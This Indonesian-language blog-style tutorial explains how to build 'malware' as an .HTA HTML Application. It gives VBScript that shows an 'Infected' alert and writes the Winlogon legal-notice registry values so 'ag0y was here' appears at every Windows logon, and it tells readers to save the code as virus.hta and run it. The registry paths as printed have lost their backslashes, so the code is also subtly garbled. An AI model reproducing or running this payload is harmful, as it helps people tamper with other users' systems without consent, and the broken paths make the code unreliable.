Membuat malware tidak sebatas menggunakan extension *.EXE, *.COM, *.SCR, *.PIF, *.CMD, *.BAT, atau *.VBS saja.

Ternyata ada extension lain yang bisa dimanfaatkan untuk membuat sebuah malware, yaitu *.HTA atau HTML Application.

Pada dasarnya cara membuat malware dengan extension ini sama halnya dengan VBScript, hanya membutuhkan dua baris kode yang ditaruh di awal dan akhir baris pada tubuh malware tersebut.

Contoh menggunakan VBS

Set regkey = CreateObject("Wscript.Shell")
MsgBox "Infected...!!!", vbCritical, "Warning"
regkey.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonLegalNoticeText", "ag0y was here"
regkey.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonLegalNoticeCaption", "Warning"
self.close

Jika menggunakan HTA maka akan menjadi seperti ini

<script type="text/vbscript">
Set regkey = CreateObject("Wscript.Shell")
MsgBox "Infected...!!!", vbCritical, "Warning"
regkey.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonLegalNoticeText", "ag0y was here"
regkey.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonLegalNoticeCaption", "Warning"
self.close
</script>

Simpan kode diatas dengan extension *.hta , misalnya virus.hta lalu buka filenya.

intinya adalah menambahkan kode < script type=”text/vbscript” > diawal baris dan </script> di akhir baris.